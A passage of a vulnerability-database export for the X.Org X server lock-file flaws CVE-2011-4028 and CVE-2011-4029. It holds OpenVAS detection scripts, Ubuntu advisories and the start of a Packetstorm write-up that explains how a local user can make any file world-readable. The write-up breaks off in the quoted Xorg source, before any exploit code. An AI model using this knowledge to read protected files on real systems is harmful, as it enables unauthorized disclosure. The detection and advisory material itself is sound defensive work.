"2017-07-02T21:10:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-04-11T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:70617", "href": "http://plugins.openvas.org/nasl.php?oid=70617", "type": "openvas", "title": "FreeBSD Ports: xorg-server", "sourceData": "#\n#VID 8441957c-f9b4-11e0-a78a-bcaec565249c\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 8441957c-f9b4-11e0-a78a-bcaec565249c\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: xorg-server\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70617);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-11 11:02:04 +0200 (Tue, 11 Apr 2017) $\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_version(\"$Revision: 5931 $\");\n script_name(\"FreeBSD Ports: xorg-server\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"xorg-server\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.7_3\")<0) {\n txt += 'Package xorg-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:36:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "Oracle Linux Local Security Checks ELSA-2012-0939", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123878", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123878", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0939", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0939.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123878\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:09:45 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0939\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0939 - xorg-x11-server security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0939\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0939.html\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xdmx\", rpm:\"xorg-x11-server-Xdmx~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xnest\", rpm:\"xorg-x11-server-Xnest~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xvfb\", rpm:\"xorg-x11-server-Xvfb~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-devel\", rpm:\"xorg-x11-server-devel~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-source\", rpm:\"xorg-x11-server-source~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:136141256231070617", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070617", "type": "openvas", "title": "FreeBSD Ports: xorg-server", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_xorg-server2.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 8441957c-f9b4-11e0-a78a-bcaec565249c\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70617\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_version(\"$Revision: 11762 $\");\n script_name(\"FreeBSD Ports: xorg-server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: xorg-server\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"xorg-server\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.7_3\")<0) {\n txt += 'Package xorg-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-31T18:42:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2012-08-02T00:00:00", "id": "OPENVAS:1361412562310850266", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850266", "type": "openvas", "title": "openSUSE: Security Advisory for xorg-x11-server (openSUSE-SU-2012:0227-1)", "sourceData": "# Copyright (C) 2012 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850266\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-08-02 23:08:35 +0530 (Thu, 02 Aug 2012)\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"openSUSE-SU\", value:\"2012:0227-1\");\n script_name(\"openSUSE: Security Advisory for xorg-x11-server (openSUSE-SU-2012:0227-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-x11-server'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.3\");\n\n script_tag(name:\"affected\", value:\"xorg-x11-server on openSUSE 11.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"insight\", value:\"The X server had two security issues and one bug that is\n fixed by this update.\n\n CVE-2011-4028: It is possible for a local attacker to\n deduce if a file exists or not by exploiting the way that\n Xorg creates its lock files.\n\n CVE-2011-4029: It is possible for a non-root local user to\n set the read permission for all users on any file or\n directory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-Xvnc\", rpm:\"xorg-x11-Xvnc~7.5_1.8.0~10.15.2\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server\", rpm:\"xorg-x11-server~7.5_1.8.0~10.15.2\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-extra\", rpm:\"xorg-x11-server-extra~7.5_1.8.0~10.15.2\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-sdk\", rpm:\"xorg-x11-server-sdk~7.5_1.8.0~10.15.2\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-19.", "modified": "2018-10-12T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:136141256231070782", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070782", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-19 (xorg-server)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201110_19.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70782\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:40 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-19 (xorg-server)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in the X.Org X server might allow local\n attackers to disclose information.\");\n script_tag(name:\"solution\", value:\"All X.Org X Server 1.9 users should upgrade to the latest 1.9 version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-base/xorg-server-1.9.5-r1'\n\n\nAll X.Org X Server 1.10 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-base/xorg-server-1.10.4-r1'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-19\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=387069\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201110-19.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"x11-base/xorg-server\", unaffected: make_list(\"rge 1.9.5-r1\", \"ge 1.10.4-r1\"), vulnerable: make_list(\"lt 1.10.4-r1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}], "ubuntu": [{"lastseen": "2020-07-09T01:42:12", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2010-4819", "CVE-2011-4029", "CVE-2010-4818"], "description": "USN-1232-1 fixed vulnerabilities in the X.Org X server. A regression was \nfound on Ubuntu 10.04 LTS that affected GLX support.\n\nThis update temporarily disables the fix for CVE-2010-4818 that introduced \nthe regression.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nIt was discovered that the X server incorrectly handled certain malformed \ninput. An authorized attacker could exploit this to cause the X server to \ncrash, leading to a denial or service, or possibly execute arbitrary code \nwith root privileges. This issue only affected Ubuntu 10.04 LTS and 10.10. \n(CVE-2010-4818)\n\nIt was discovered that the X server incorrectly handled certain malformed \ninput. An authorized attacker could exploit this to cause the X server to \ncrash, leading to a denial or service, or possibly read arbitrary data from \nthe X server process. This issue only affected Ubuntu 10.04 LTS. \n(CVE-2010-4819)\n\nVladz discovered that the X server incorrectly handled lock files. A local \nattacker could use this flaw to determine if a file existed or not. \n(CVE-2011-4028)\n\nVladz discovered that the X server incorrectly handled setting lock file \npermissions. A local attacker could use this flaw to gain read permissions \non arbitrary files and view sensitive information. (CVE-2011-4029)", "edition": 5, "modified": "2011-10-19T00:00:00", "published": "2011-10-19T00:00:00", "id": "USN-1232-2", "href": "https://ubuntu.com/security/notices/USN-1232-2", "title": "X.Org X server regression", "type": "ubuntu", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:31:49", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2010-4819", "CVE-2011-4029", "CVE-2010-4818"], "description": "It was discovered that the X server incorrectly handled certain malformed \ninput. An authorized attacker could exploit this to cause the X server to \ncrash, leading to a denial or service, or possibly execute arbitrary code \nwith root privileges. This issue only affected Ubuntu 10.04 LTS and 10.10. \n(CVE-2010-4818)\n\nIt was discovered that the X server incorrectly handled certain malformed \ninput. An authorized attacker could exploit this to cause the X server to \ncrash, leading to a denial or service, or possibly read arbitrary data from \nthe X server process. This issue only affected Ubuntu 10.04 LTS. \n(CVE-2010-4819)\n\nVladz discovered that the X server incorrectly handled lock files. A local \nattacker could use this flaw to determine if a file existed or not. \n(CVE-2011-4028)\n\nVladz discovered that the X server incorrectly handled setting lock file \npermissions. A local attacker could use this flaw to gain read permissions \non arbitrary files and view sensitive information. (CVE-2011-4029)", "edition": 5, "modified": "2011-10-18T00:00:00", "published": "2011-10-18T00:00:00", "id": "USN-1232-1", "href": "https://ubuntu.com/security/notices/USN-1232-1", "title": "X.Org X server vulnerabilities", "type": "ubuntu", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2010-4819", "CVE-2011-4029", "CVE-2010-4818"], "description": "USN-1232-1 fixed vulnerabilities in the X.Org X server. A regression was \nfound on Ubuntu 10.04 LTS that affected GLX support, and USN-1232-2 was \nreleased to temporarily disable the problematic security fix. This update \nincludes a revised fix for CVE-2010-4818.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nIt was discovered that the X server incorrectly handled certain malformed \ninput. An authorized attacker could exploit this to cause the X server to \ncrash, leading to a denial or service, or possibly execute arbitrary code \nwith root privileges. This issue only affected Ubuntu 10.04 LTS and 10.10. \n(CVE-2010-4818)\n\nIt was discovered that the X server incorrectly handled certain malformed \ninput. An authorized attacker could exploit this to cause the X server to \ncrash, leading to a denial or service, or possibly read arbitrary data from \nthe X server process. This issue only affected Ubuntu 10.04 LTS. \n(CVE-2010-4819)\n\nVladz discovered that the X server incorrectly handled lock files. A local \nattacker could use this flaw to determine if a file existed or not. \n(CVE-2011-4028)\n\nVladz discovered that the X server incorrectly handled setting lock file \npermissions. A local attacker could use this flaw to gain read permissions \non arbitrary files and view sensitive information. (CVE-2011-4029)", "edition": 5, "modified": "2011-10-20T00:00:00", "published": "2011-10-20T00:00:00", "id": "USN-1232-3", "href": "https://ubuntu.com/security/notices/USN-1232-3", "title": "X.Org X server vulnerability", "type": "ubuntu", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-4028", "CVE-2010-4819", "CVE-2011-4029", "CVE-2010-4818"], "description": "==========================================================================\r\nUbuntu Security Notice USN-1232-1\r\nOctober 18, 2011\r\n\r\nxorg-server vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.10\r\n- Ubuntu 11.04\r\n- Ubuntu 10.10\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nThe X server could be made to crash, run programs as an administrator, or\r\nread arbitrary files.\r\n\r\nSoftware Description:\r\n- xorg-server: X.Org X server\r\n\r\nDetails:\r\n\r\nIt was discovered that the X server incorrectly handled certain malformed\r\ninput. An authorized attacker could exploit this to cause the X server to\r\ncrash, leading to a denial or service, or possibly execute arbitrary code\r\nwith root privileges. This issue only affected Ubuntu 10.04 LTS and 10.10.\r\n(CVE-2010-4818)\r\n\r\nIt was discovered that the X server incorrectly handled certain malformed\r\ninput. An authorized attacker could exploit this to cause the X server to\r\ncrash, leading to a denial or service, or possibly read arbitrary data from\r\nthe X server process. This issue only affected Ubuntu 10.04 LTS.\r\n(CVE-2010-4819)\r\n\r\nVladz discovered that the X server incorrectly handled lock files. A local\r\nattacker could use this flaw to determine if a file existed or not.\r\n(CVE-2011-4028)\r\n\r\nVladz discovered that the X server incorrectly handled setting lock file\r\npermissions. A local attacker could use this flaw to gain read permissions\r\non arbitrary files and view sensitive information. (CVE-2011-4029)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.10:\r\n xserver-xorg-core 2:1.10.4-1ubuntu4.1\r\n\r\nUbuntu 11.04:\r\n xserver-xorg-core 2:1.10.1-1ubuntu1.3\r\n\r\nUbuntu 10.10:\r\n xserver-xorg-core 2:1.9.0-0ubuntu7.5\r\n\r\nUbuntu 10.04 LTS:\r\n xserver-xorg-core 2:1.7.6-2ubuntu7.8\r\n\r\nAfter a standard system update you need to restart your session to make\r\nall the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1232-1\r\n CVE-2010-4818, CVE-2010-4819, CVE-2011-4028, CVE-2011-4029\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/xorg-server/2:1.10.4-1ubuntu4.1\r\n https://launchpad.net/ubuntu/+source/xorg-server/2:1.10.1-1ubuntu1.3\r\n https://launchpad.net/ubuntu/+source/xorg-server/2:1.9.0-0ubuntu7.5\r\n https://launchpad.net/ubuntu/+source/xorg-server/2:1.7.6-2ubuntu7.8\r\n", "edition": 1, "modified": "2011-10-20T00:00:00", "published": "2011-10-20T00:00:00", "id": "SECURITYVULNS:DOC:27170", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27170", "title": "[USN-1232-1] X.Org X server vulnerabilities", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:44", "bulletinFamily": "software", "cvelist": ["CVE-2011-4028", "CVE-2010-4819", "CVE-2011-4029", "CVE-2010-4818"], "description": "Memory corruprions, insecure lock file creation.", "edition": 1, "modified": "2011-10-20T00:00:00", "published": "2011-10-20T00:00:00", "id": "SECURITYVULNS:VULN:11984", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11984", "title": "X.Org multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:22", "description": "", "published": "2011-10-27T00:00:00", "type": "packetstorm", "title": "Xorg Permission Change", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4029"], "modified": "2011-10-27T00:00:00", "id": "PACKETSTORM:106307", "href": "https://packetstormsecurity.com/files/106307/Xorg-Permission-Change.html", "sourceData": "`Author: vladz <vladz@devzero.fr> (new on twitter @v14dz!) \nDescription: Xorg permission change vulnerability (CVE-2011-4029) \nProduct: X.Org (http://www.x.org/releases/) \nAffected: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and \nearlier if built with the USE_CHMOD preprocessor identifier \n \nPoC tested on: Debian 6.0.2 up to date with X default configuration issued \nfrom the xserver-xorg-core package (version 2:1.7.7-13) \n \nFollow-up: 2011/10/07 - X.org foundation informed \n2011/10/09 - Distros informed \n2011/10/18 - Issue/patch publicly announced \n \n \nIntroduction \n------------ \n \nI've found a file permission change vulnerability in the way that Xorg \ncreates its temporary lock file \"/tmp/.tXn-lock\" (where 'n' is the X \ndisplay). When exploited, this vulnerability allows a non-root user to set \nthe read permission for all users on any file or directory. \n \nFor the exploit to succeed the local attacker needs to be able to run the \nX.Org X11 X server. \n \nNOTE: At this time (26/10/2010), some distros are still vulnerable (see \n\"Fix & Patch\" above for more informations). \n \n \nDescription \n----------- \n \nOnce started, Xorg attempts to create a lock file \"/tmp/.Xn-lock\" in a \nsecure manner: it creates/opens a temporary lock file \"/tmp/.tXn-lock\" \nwith the O_EXCL flag, writes the current PID into it, links it to the final \n\"/tmp/.Xn-lock\" and unlink \"/tmp/.tXn-lock\". Here is the code: \n \n$ cat -n os/utils.c \n[...] \n288 /* \n289 * Create a temporary file containing our PID. Attempt three times \n290 * to create the file. \n291 */ \n292 StillLocking = TRUE; \n293 i = 0; \n294 do { \n295 i++; \n296 lfd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0644); \n297 if (lfd < 0) \n298 sleep(2); \n299 else \n300 break; \n301 } while (i < 3); \n302 if (lfd < 0) { \n303 unlink(tmp); \n304 i = 0; \n305 do { \n306 i++; \n307 lfd = open(tmp, O_CREAT | O_EXCL | 